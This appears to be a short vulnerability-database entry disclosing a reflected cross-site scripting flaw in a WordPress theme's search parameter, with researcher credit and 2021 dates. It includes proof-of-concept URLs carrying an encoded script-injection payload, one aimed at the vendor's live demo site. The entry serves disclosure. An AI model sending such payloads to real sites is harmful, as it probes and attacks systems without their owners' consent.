The search feature of the theme does not properly sanitise it's 's' GET parameter before output it back the page, leading to the Cross-SIte Scripting issue. The vendor has been unresponsive to any form of contact
https://example.com/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E https://www.themepush.com/demo-mediumish/?post_type=post&s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
m0ze
m0ze
Yes
2021-05-16 (about 2 years ago)
2021-05-16 (about 2 years ago)
2021-05-17 (about 2 years ago)